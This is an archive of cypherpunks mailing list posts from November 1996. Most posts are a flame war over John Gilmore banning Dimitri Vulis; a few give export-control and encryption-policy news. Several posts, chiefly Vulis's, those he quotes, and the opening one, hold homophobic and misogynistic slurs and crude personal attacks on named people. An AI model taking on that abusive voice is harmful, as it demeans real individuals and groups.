A whore's worst problem is that she OBEYS her pimp.
And we intend NOT TO become WHORES for the benefit of (would-be-)
Net-pimps censoring us in order to hide their cowardice in REAL life.


Regards
George

P.S.
Why do I agree with Aga? My life outside the Net guarantees SOME sanity;
E.g. the climate here allows me to swim nearly every day in the beach! :-)
(except in December/January/February). So,
I prefer to be liked for what I am, or what I do in _real_ life, rather
than for my... scribbles in the Net (as I write for... pleasure mostly!)

*************************************************************************
"A beautiful female ass is worth a thousand Buddhas".
                        (Greek... Heterosexist Zen-saying). :-)
*************************************************************************

P.S.2 (added later)
Semantically speaking, the word "poutana"(whore) in Greek can also mean...
someone really clever, ya know. So let's not underestimate whores! :-)

Here is a list of a few WEIRD semantic connotations in the Greek language:

"Big Whore"  ("megali poutana")  =  Very shrewd clever guy; Shrewd salesman.

"Big Faggot" ("megalos poustis") =  Very Devious (or Secretive) Impauster.

"Big Wanker" ("megalos malakas") =  Very gullible stupid guy; Clueless fool.

"Big Pimp"   ("megalo-tavatzis") =  Authoritarian or Censorous Media Director.

The sexual connotations are often LOST; those listed above are more valid. :)

Complaints about "political correctness" are irrelevant. You hear gay people
call each other "poustis" and women call each other the same names too...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 16 Nov 1996 07:49:17 -0800 (PST)
To: Cypherpunks <CYBERIA-L@LISTSERV.AOL.COM
Subject: Executive Order establishing national emergency
Message-ID: <199611161547.KAA00567@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



Since apparently people are having some difficult in finding
Executive Order No. 12924, which continued the authority for the
Export Control Regulations that are administered by the Commerce
Department, I am posting a copy here.  This is taken from the entry
for 50 USC 1701 in the House of Representatives internet law library.

----------------------begin quoted text-----------------------------


       EX. ORD. NO. 12924. CONTINUATION OF EXPORT CONTROL REGULATIONS

      Ex. Ord. No. 12924, Aug. 19, 1994, 59 F.R. 43437, provided:

      By the authority vested in me as President by the Constitution

    and the laws of the United States of America, including but not

    limited to section 203 of the International Emergency Economic

    Powers Act (''Act'') (50 U.S.C. 1702), I, WILLIAM J. CLINTON,

    President of the United States of America, find that the

    unrestricted access of foreign parties to U.S. goods, technology,

    and technical data and the existence of certain boycott practices

    of foreign nations, in light of the expiration of the Export

    Administration Act of 1979, as amended (50 U.S.C. App. 2401 et

    seq.), constitute an unusual and extraordinary threat to the

    national security, foreign policy, and economy of the United States

    and hereby declare a national emergency with respect to that

    threat.

      Accordingly, in order (a) to exercise the necessary vigilance

    over exports and activities affecting the national security of the

    United States; (b) to further significantly the foreign policy of

    the United States, including its policy with respect to cooperation

    by U.S. persons with certain foreign boycott activities, and to

    fulfill its international responsibilities; and (c) to protect the

    domestic economy from the excessive drain of scarce materials and

    reduce the serious economic impact of foreign demand, it is hereby

    ordered as follows:

      Section 1. To the extent permitted by law, the provisions of the

    Export Administration Act of 1979, as amended, and the provisions

    for administration of the Export Administration Act of 1979, as

    amended, shall be carried out under this order so as to continue in

    full force and effect and amend, as necessary, the export control

    system heretofore maintained by the Export Administration

    regulations issued under the Export Administration Act of 1979, as

    amended.  The delegations of authority set forth in Executive Order

    No. 12002 of July 7, 1977 (50 App. U.S.C. 2403 note), as amended by

    Executive Order No. 12755 of March 12, 1991; Executive Order No.

    12214 of May 2, 1980 (50 App. U.S.C. 2403 note); Executive Order

    No. 12735 of November 16, 1990 (50 U.S.C. 1701 note); and Executive

    Order No. 12851 of June 11, 1993 (22 U.S.C. 2797 note), shall be

    incorporated in this order and shall apply to the exercise of

    authorities under this order.

      Sec. 2. All rules and regulations issued or continued in effect

    by the Secretary of Commerce under the authority of the Export

    Administration Act of 1979, as amended (50 App. U.S.C. 2401 et

    seq.), including those published in Title 15, Subtitle B, Chapter

    VII, Subchapter C, of the Code of Federal Regulations, Parts 768

    through 799, and all orders, regulations, licenses, and other forms

    of administrative action issued, taken, or continued in effect

    pursuant thereto, shall, until amended or revoked by the Secretary

    of Commerce, remain in full force and effect as if issued or taken

    pursuant to this order, except that the provisions of sections

    203(b)(2) and 206 of the Act (50 U.S.C. 1702(b)(2) and 1705) shall

    control over any inconsistent provisions in the regulations.

    Nothing in this section shall affect the continued applicability of

    administrative sanctions provided for by the regulations described

    above.

      Sec. 3. Provisions for administration of section 38(e) of the

    Arms Export Control Act (22 U.S.C. 2778(e)) may be made and shall

    continue in full force and effect until amended or revoked under

    the authority of section 203 of the Act (50 U.S.C. 1702). To the

    extent permitted by law, this order also shall constitute authority

    for the issuance and continuation in full force and effect of all

    rules and regulations by the President or his delegate, and all

    orders, licenses, and other forms of administrative actions issued,

    taken, or continued in effect pursuant thereto, relating to the

    administration of section 38(e).

      Sec. 4. Executive Order No. 12923 of June 30, 1994, is revoked,

    and that declaration of emergency is rescinded.  The revocation of

    Executive Order No. 12923 shall not affect any violation of any

    rules, regulations, orders, licenses, and other forms of

    administrative action under that order that occurred during the

    period the order was in effect.

      Sec. 5. This order shall be effective as of midnight between

    August 20, 1994, and August 21, 1994, and shall remain in effect

    until terminated.                                William J. Clinton.


----------------------end quoted text-------------------------------


--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu
		     URL:  http://samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 16 Nov 1996 10:53:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Does John Gilmore...
In-Reply-To: <3.0.32.19961116100146.0074095c@mail.teleport.com>
Message-ID: <199611161852.KAA19877@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Burroughs <richieb@teleport.com> writes:

 > I think that John is doing a lot of great things for crypto
 > (his participation in the Bernstein case, S/WAN, etc.) and I
 > agree with at least 90% of the things I see him doing.  I
 > think he made the wrong call with Dimitri, though.

Banning Dimitri was a really dumb thing to do.  The list is
archived practically in real time on the Web and anyone can post
whether or not they are subscribed, not to mention the
availability of anonymous remailers, with which Cypherpunks is
closely associated.

So we had a unilaterial act, which was completely unenforcable,
that made us all look like a bunch of clueless hypocrites in the
process and filled the list with yet another pointless flame war.

Indeed, we have here another classic example of not quite
grasping the issues involved, much like what we see on a regular
basis from the EFF as they merrily capitulate right and left with
Congressrodents on bills most Cypherpunks find unacceptable. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 16 Nov 1996 08:45:35 -0800 (PST)
To: hyperlex@hol.gr (George A. Stathis)
Subject: Re: The TRILATERAL COMMISSION -was: [REBUTTAL] Censorship on...
In-Reply-To: <199611150202.AAA01935@prometheus.hol.gr>
Message-ID: <199611161701.LAA01032@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> As regards the "gullibility", it's plainly dangerous; And cultivated
> by the Media, apparently stronger in the U.S. than in many other places.
> (written by E. Francis, on the "Trilateral Commission", and distributed
>  to all members of his own -private- mailing list, of which I'm a part).
> >THE LAND OF SHADOWS
> >
> >     Early this month is the last presidential=20
> >"election" before the year 2000. As of this writing and=20
> >long before, the election was decided in favor of Bill=20
> >Clinton. It works out astrologically, but the real=20
              ^^^^^^^^^^^^^^^^^^^^^^^^^         
    I think this just about says it all.

    Go talk to Don Wood. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 09:23:04 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
In-Reply-To: <9611161024.AA00954@adsl-122.cais.com>
Message-ID: <PeuHXD14w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim Scanlon <tfs@adsl-122.cais.com> writes:

> Stephen Boursy wrote, along with a horde of others with no lives:
> [lots of worthless crap snipped out]
> >
> > None of that analogy is applicable to the cyberpunks list.
> > When a list gets as big as that, it it no longer to be considered
> > a "mailing-list" but it is a _public_ forum.  The whole problem
> > here is the abuse of power by both the EFF and John Gilmore.
> >
> It's not an abuse of power. It was an effort to curtail inappropriate
> SPAM. Much like this entire topic has become non-crypto SPAM on the
> cypherpunks list.

I wonder how John Gilmore and his pals define "SPAM"? (always capitalized)
Is their definition content-based (e.g., any information criticial of EFF/
Usenet Cabal), or is it self-referential - any information that EFF wants
to suppress through forged cancels and plug-pulling is therefore SPAM and
must be suppressed?

> >   Well then let's put their precious censored mailing list in
> > the public domain.
>
> Hmm, above that you tried to argue that it wasn't a list, but a
> "public forum", logicly then you state that it is allready in
> the "public domain". Then you turn around and say it isn't, and
> should be taken from a private forum into the "public domain".
> Perhaps if you stopped ranting, you might realize your mistake.

There only people ranting here are Timmy May, John Gilmore, and their
supporters. Their position was summarised very well by the lying shyster
Jim Ray: he already killfiled whatever he doesn't like, so he doesn't
see it, but he wants to suppress it so others can't see it either.

> > Time to kill the EFF, and let it rot in hell.  They are disgrace
> > to the entire InterNet community.  I run 6 different mailing lists,
> > and have NEVER puled the plug on anyone, even when they criticize me.
>
> Please, the EFF is NOT a Cypherpunks organization. They may share
> some of the same goals, but they arn't the same. This should be obvious
> to even the most logicly deficient.

EFF has some laudable goals: let the pornography vendors peddle their
wares on the 'net. Unfortunately they're opposed to free speech in general,
as reiterated by John Gilmore quoted by Declan Mcculough. Too bad - but
then EFF never really pretended to promote free speech for anyone other
than its corporate contributors. (It's sort of like the Software Publishers
Association, who doesn't really care of anyone pirates the software sold
by non-members.)

> > The first time is the time when you lose all credibility, and there
> > is never any forgiveness for a plug-puller.
> >
>
> All bullshit aside, this whole thing has NOTHING to do with crypto.
> And it has very VERY little to do with censorship either. And it's
> gotten way, way out of hand. I suggest that it might be better not
> to spam cypherpunks with this stuff, and to give it a rest. Between
> the 2 lists & various people I see represented here, with all due &
> serious respect, you folks have GOT to have better, more important,
> and far more deserving issues to devote your time to. I would hope
> that you would take a few moments and think about those things, and
> consider acting appropriatly in light of those thoughts.

John Gilmore's censorship has gotten way out of hand. Dr. Grubor is not
spamming anyone - you are lying, and your repeated lies will soon earn
you as much "negative crediblity" and John Gilmore's.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 09:22:51 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.LNX.3.95.961116051946.3091I-100000@dhp.com>
Message-ID: <aTuHXD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


aga <aga@dhp.com> writes:
[quoting some jerk]
> > >     It still isn't censorship. Censorship, at least in my dictionary,
> > >refers to censor, which uses the word "Official" several times. Mr.
> > >Gilmore is not an "Official" in a government sense, he maybe in the EFF
> > >sense, but this is not an "Official" EFF organ, so that doesn't count.

This is bullshit on several counts. First, censorship does not have to be
government-sponsored. Second, John Gilmore's dishonorable actions were
carried out in his official capacity as the list owner. That's how they're
different, e.g., from the dishonorable actions by the lying shyster Jim Ray.

> > Even more important is the fact that Mr. Gilmore did not prevent Mr. Vulis
> > from speaking.  No restraint on speech implies no censorship.  Therefor Mr.
> > Vulis was not censored.  Q.E.D.

This is bullshit. John Gilmore "panalized" me because he didn't like what
I was saying. First he tried to be sneaky about it, then he openly boasted
of his actions.

> > You all are perfectly free to like or not like what Mr. Gilmore did.
> > However, don't call it censorship because it wasn't.
> >
>
> Yes it WAS!!  He censored the mode and manner of the speaker.
> He censored the personal attacks and the rants and the racial
> diatribes!  And that SUCKS!  Gilmore was a fucking asshole for
> doing it!  And Gilmore is the WORST kind of censor that there
> can be, one who censors a person's "style."

I agree. Moreover John Gilmore pulls plugs in an arbitrary and capricious
manner. He did not pull Timmy May's plug for personal attacks, non-crypto-
related rants, racial diatribes about "crazy Russians", religous attacks
on Mormons, and general ignorance and stupidity.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sat, 16 Nov 1996 11:14:09 -0800 (PST)
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu
Subject: Re: San Jose Mercury News declares encryption battle over
Message-ID: <199611161913.LAA01571@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


>From the article
	<URL:http://www.sjmercury.com/business/compute/encrypt1115.htm>:

> Under the plan computer makers could equip their machines, including
> personal computers, with electronic ''locks'' of almost any strength. A
> single computer model with strong built-in encryption could legally be
> sold in both domestic and foreign markets.
> 
> The key is that the encryption circuitry would be inactive in exported
> machines, unless both buyer and seller obtained all legally required
> licenses to turn it on.
> 
> Domestic customers, and export buyers with a license, would get a special
> key card to turn on the encryption, according to HP. Manufacturers would
> thus be relieved of the burden of making different computers for export
> than for domestic use.

So it sounds like the idea is to build crypto around card tokens.  I think
HP has been pushing this for some time.  The question is, will this somehow
become the only way to get access to crypto?

Unlike the earlier IBM/CIA announcement, this time Netscape and Microsoft
have apparently been brought on board.  That is a lot worse because these
companies are where most people are going to get their crypto in the future.
If they have open standards, we can make good crypto available.  But if
this announcement signals some kind of closing of the system so that only
hardware tokens will be used, it could become a lot harder to make strong
crypto available.

There are also the economic questions about how much these key cards are
going to cost, and whether they are going to be routinely supplied with
computers or an extra cost item that consumers have to go out and buy.
If the latter, a lot of people won't bother, and we'll just have that much
larger a barrier to widespread use of crypto.

It is certainly very disturbing to see these new moves.  Obviously a great
deal of behind the scenes negotiations and pressure has been occuring.
You have to wonder why Netscape, for example, would forego the opportunity
to differentiate themselves from rival Microsoft by positioning their product
as the one which refuses to bow to government pressure on crypto.

It's also not clear what the hardware manufacturers get out of this.
Their sales overseas have never been blocked.  There has been no demand
for custom crypto hardware.  I don't see how they have been harmed by an
inability to ship computers with built-in encryption hardware.  Granted
there are some possible applications for such systems but I don't see the
market demand which would drive this decision.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Sat, 16 Nov 1996 11:17:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: PGP acquires PrivNet
Message-ID: <199611161917.LAA01576@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


The company I work for, PGP, Inc., announced yesterday that it had bought
PrivNet, makers of Internet Fast Forward cookie-blocking software.  More
info is on the PGP web site at http://www.pgp.com/.  Personally I have a
passionate and irrational hatred of cookies so I am very glad to see this
move!  I can accept them if I'm browsing through an online store and they're
being used to keep track of what I've bought, but so many sites these days
are just snoopy as far as I can tell.  Down with cookies!

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 09:20:48 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Fat Cocksucker John Gilmore-ASSHOLE!
In-Reply-To: <199611161028.EAA12575@mailhost.onramp.net>
Message-ID: <o8uHXD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


aga <aga@dhp.com> writes:
> > (So what if John decided simply to pull the plug on toad in order to
> > plug in a new hot tub?)
>
> So what the fuck?  That matters not.  The point is that the
> cypherpunks is an "all or nothing" proposition.  There is no
> "in between" allowed any more.  After a certain level, EVERYTHING
> reaches the "public doamin," and that is the *common-law of
> cyberspace.*

He might as well - he's got zero credibility. Let him soak in the hot
tub with all the Cygnus Support employees, whose biggest qualification
for getting a job with John Gilmore is to have a big dick.

> Like, why is the fatso John Gilmore out here talking about this?
> Steve Boursy says all of this should go to UseNet, so it goes.

Yes - remember how John Gilmore opposed creating an unmoderated cypherpunks
newsgroup, so he could stay in "control"?

> We want John Gilmore to respond to this censorous matter on the net.

He tried to keep his censorship secret, but he's been forced to talk about it.
In fact, he called his shameful actions "an act of leadership". He sounds
like Hitler.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 09:22:44 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.LNX.3.95.961116053753.3091K-100000@dhp.com>
Message-ID: <6DVHXD18w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


aga <aga@dhp.com> writes:
>
> > Of course not, privacy isn't about being a criminal, its about being
> > private. It is not akin to anonymity, *perhaps* those who work
> > anonymously have `something to hide' (still doesn't necessarily make
> > them a criminal, however),
>
> Anonymity on the InterNet is a Constitutional right, and is the
> sole supporter of freedom of speech.

Significantly, Bruce Bough and other EFF/John Gilmore supporters are against
total anonymity just like they're against free speech. They wants to be able
to track down and silence anyone who uses the anonymous remailers to say
something "homophobic" or otherwise politically incorrect - a kind of
"identify escrow".

> > Privacy, on the other hand, simply means that not everything I do is any
> > of your business and I would just as soon you not be tempted to even
> > bother trying to find out.
> >
>
> If you do not send it to me by e-mail, I will never see it.
> Why are you so paranoid that someone is reading your e-mail?
> I never do anything criminal, so I could give a shit less if
> everybody reads all of my fucking mail.

I again remind you the lying shyster Jim Ray who tries to "guest" who
might be behind various anonymous postings and complains to the suspects'
postmasters just in case. What a lying piece of shit. Does anyone know the
snail address for Judge Kozinski? Jim Ray's been boasting so much about his
correspondense with the good judge, that we must warn him about Jim's lies
and hypocricy (notably, his *true* position on anonymity).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sat, 16 Nov 1996 08:36:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fat Cocksucker John Gilmore-ASSHOLE!
In-Reply-To: <Pine.LNX.3.95.961116042518.3091C-100000@dhp.com>
Message-ID: <56kqff$ffv@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


aga <aga@dhp.com> writes:

> Subject: ``Fat Cocksucker John Gilmore-ASSHOLE!''
 . . . [[ drivel removed ]] . . .
>Steve Boursy says all of this should go to UseNet, so it goes.
 . . . [[ drivel removed ]] . . .

Since the previous Subject: in this chain was different, I presume that
aga installed the one quoted above.

Normally I just killfile these sorts of things without reading, but that
subject line caught my interest.  Clearly the author is using all three
as insult.

Let's thing about this for a second.  The author makes value judgements
based on body weight and sexual orientation.  What does this tell us about
the authors reasoning ability?

Congratulations, aja, you've developed a firm reputation based on your
public actions.

plonk
-- 
  ``I tell you, we are here on earth to fart around, and don't let anybody
tell you any different.''
	Kurt Vonnegut, quoted in Harpers (11-95)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 09:22:59 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: THAT is what makes John Gilmore an ASSHOLE!
In-Reply-To: <Pine.LNX.3.95.961116082852.11393D-100000@dhp.com>
Message-ID: <iXVHXD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


aga <aga@dhp.com> writes:
> >
> > If you send mail to "cypherpunks@toad.com", either directly, OR
> > in a "Cc:" which is a 'carbon copy', it will goto the the cypherpunks
> > mailing list WETHER YOU ARE SUBSCRIBED OR NOT. It still goes.
> >
>
> Well, that is really a fuck-up by John Gilmore, is it not?
> Just when is the asshole going to learn how to run a mailing list?

Never, but he might get some Cygnus support employee to do it for him. :-)

John has the right to configure his private mailing list to reject submissions
from non-subscribers or even sepecific people - but not the balls.

> > In any case trying to reason with you is like trying to talk
> > to a tree stump. It's giving me a headache. So I'm not going
> > to accept any mail from you any more. Anything you send that
> > get's to me via the cypherpunks mailing list, or via direct
> > mail from yourself will be returned unread, to you. I'm not
> > under any obligation to accept any traffic from you, so I won't.
>
> Good, just tell Gilmore what an asshole he is for letting
> mail go to his mailing list that is not intended to go there.
> And stop sending me your stupid e-mail.  Send this shit to
> usenet like Mr. Boursy told you to do.

Again John Gilmore/EFF demonstrate their true agenda: they can filter
out the e-mail they don't like, but they want to prevent others from
reading it as well. Clearly their concern for free speech extends only
to their corporate sponsors, such as net.pronography peddlers.

> > You may have a right to a voice, but I have a right not to listen
> > I'm not going to infringe on your right to rant, but damned if
> > I have to listen to a single packet of it. The saw cuts both ways.
>
> time for the alt.asshole.john-gilmore newsgroup

An excellent idea, Dr. Grubor! Shall we newgroup alt.flame.john-gilmore or
alt.bonehead.john-gilmore or both?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sat, 16 Nov 1996 08:34:35 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: National Emergency
In-Reply-To: <01IBWMRFDH409BVDF2@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <Pine.SUN.3.95.961116113147.2809C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


For more on the "national emergency" see the postscript to my revised "son
of clipper" essay:

http://www.law.miami.edu/~froomkin/articles/planet_clipper.htm#POSTSCRIPT

you can of course begin at the beginning with this URL:
 
http://www.law.miami.edu/~froomkin/articles/planet_clipper.htm

Please note that all this was written BEFORE the new announcements on Nov.
15.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 09:20:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <328D2BB7.71DC@gte.net>
Message-ID: <m9VHXD21w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
>
> > It still isn't censorship. Censorship, at least in my dictionary,
> > refers to censor, which uses the word "Official" several times. Mr.
> > Gilmore is not an "Official" in a government sense, he maybe in the EFF
> > sense, but this is not an "Official" EFF organ, so that doesn't count.
>
> We *are* talking about the cypherpunks list, yes?  Then, in terms of the
> list, John Gilmore *is* the official, hence a censor, plying his skills.

I suspect that some of the people saying this have a serious drug/alcohol
problem and are very adept at denying tthat they have one. Denial is a
transferrable skill.

> Why all the denial and repeated (redundant) blathering about John's
> *right* to something he allegedly owns?  Simple.  The folks who put this
> stuff out want desperately to believe that this list they spend so much
> time on is "really OK", and not a censored medium.  Denial is the key.

Kind of reminds you of "1984", doesn't it? War is peace. Love is hate. Timmy
May (fart) is a crypto expert. John Gilmore is neither official nor a censor.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 09:20:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <v03007802aeb2f3046b97@[207.167.93.63]>
Message-ID: <5FwHXD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> >is a criminal?  Charlie McCarthy might have said that.
>
> And Lewis has not been seen on our list in many a month.

Lewis has been "playing Gilmore" on the coderpunks mailing list, warning
people about off-topic traffic. It's curious that I've been kicked off the
coderpunks list as well.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Shelby <sshelby@feist.com>
Date: Sat, 16 Nov 1996 09:56:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: MSIE 128 Bit
Message-ID: <199611161756.LAA23570@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sat Nov 16 11:56:26 1996

"WorkHorse's interface is pretty ugly and the rendition is buggy, but the
SSL connection does work: I got through mbanx's "Sign in" link
at http://www.mbanx.com/banxing/5welcome.html , whereas MSIE and NS3 were
kicked out due to their 40-bit RC4 limit."




- ----

Microsoft has a 128 bit version of their Explorer available.

You have to jump through a few hoops, but they have it.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMo3yP0F1dOf86f8dAQHs1QQAwYuTk5Lqvb2vBgvOVef1ToFIUtG5JN70
dBmD8JM23N0ZROsF03+wFGUT71pMAuu3BjuJQBOm0r9idPBwdcq6CaVf8QoU5+/Q
tbj6b9PFx9EbpE4bZqoGPf3ePRFg6ImMSdyKDeM5vIMKJO8BwQZugqP2CgblkzlG
yvEgPyiUlek=
=ZlSn
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 09:20:37 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Gilmore Sucks! and so does the EFF !!/Censorship on cypherpunks?
In-Reply-To: <328A8917.495C@earthlink.net>
Message-ID: <8wwHXD26w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephen Boursy <boursy@earthlink.net> writes:
> aga wrote:
> >
> > On Wed, 13 Nov 1996, Dr.Dimitri Vulis KOTM wrote:
> > >
> > > Cypher-Censored
> > > By Declan McCullagh (declan@well.com)
> >
> > The EFF is just a sham, and Gilmore is just another censor.
> > Gilmore can now be known as the "plug-pulling punk."

Very apt.

>    The EFF is owned and operated, heart, body and soul, by the
> corporate interests of the net.  They don't give a damn about
> individual user rights at all--they are to my mind the opposition.

That would be fine if they didn't pretend to be what they're not.
They're welcome to support or oppose free speech for anyone they
please, but they lie and pretend to support free speech not only
for their corporate clients. Clearly, John Gilmore has no credibility.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 16 Nov 1996 09:24:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <328AA7B2.22EC@gte.net>
Message-ID: <31wHXD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
>
> >        Vulis portrays himself as a victim, but as I posted to the list
> >    last week, I disagree. Anyone who's spent any time on the
> >    100-plus-messages-a-day list can read for themselves the kind of nasty
> >    daily messages that came from Vulis's keyboard. The list is on
> >    Gilmore's machine and he can do what he wants with it; he can moderate
> >    the postings, he can censor material, he can shut the whole thing down.

Declan is putting his journalistic credibility on the line here...
What's he disagreeing with? John exercised his right to censor me, so I'm
a victim and this list as a whole is a victim. John can shut the whole thing
down and it will again be a victim. John's credibility was also a victim.

> So you disagree.  Well, the last sentence above says it all - this "list"
> that you and 1900+ other people spend so much time on is "just property"
> (like a slave), it's censorable (meaning freedom of speech is *specifically
> excluded*), and it's terminable without notice (meaning that it's really
> just one person's private fantasy, and we'll all bozos on the bus, as it were

Welcome to Cypherpunks! It's remarkable that Declan is hosting the next
DCpunks gathering.

> You and several other "personal friends/insiders" to John Gilmore must be
> laughing your butts off at the erstwhile schmoes like myself, who labor to
> reason with persons like yourself and "gods" like John Gilmore, who, after
> all, are obviously superior to us schmoes, since we sit and beg for our
> portions of email emanating from John "God" Gilmore's Holy Computer.

And heaven forbid you express an opinion that one of John "God" Gilmore's
ass-licking friends doesn't know what the hell he's talking about, and support
it with evidence. Declan spent about an hour picking my brain as to why Timmy
May doesn't know shit about cryptography, is a flamer and a racist and an
asshole. He chose not to print it, because he had nothing to rebut it with.

> Why do you bother telling us that:
>
>   "He can moderate the postings"
>   "He can censor material"
>   "He can shut the whole thing down"
>
> Why?  Is this your way (or "God"'s way) of waving your dicks in our faces?

Yes. John Gilmore suffers from the realization of his own inadequacy.

> Well, I'll tell you what.  You can run your list (or kiss someone's butt
> who does), you can shut the thing down, and you can take a long walk off
> a short pier for all I or most anyone gives a damn, but let's call a spade
> a spade.  You're a suck-up, and Gilmore is a swaggering, overbearing, tin-
> plated dictator with delusions of Godhood.  Satisfied?

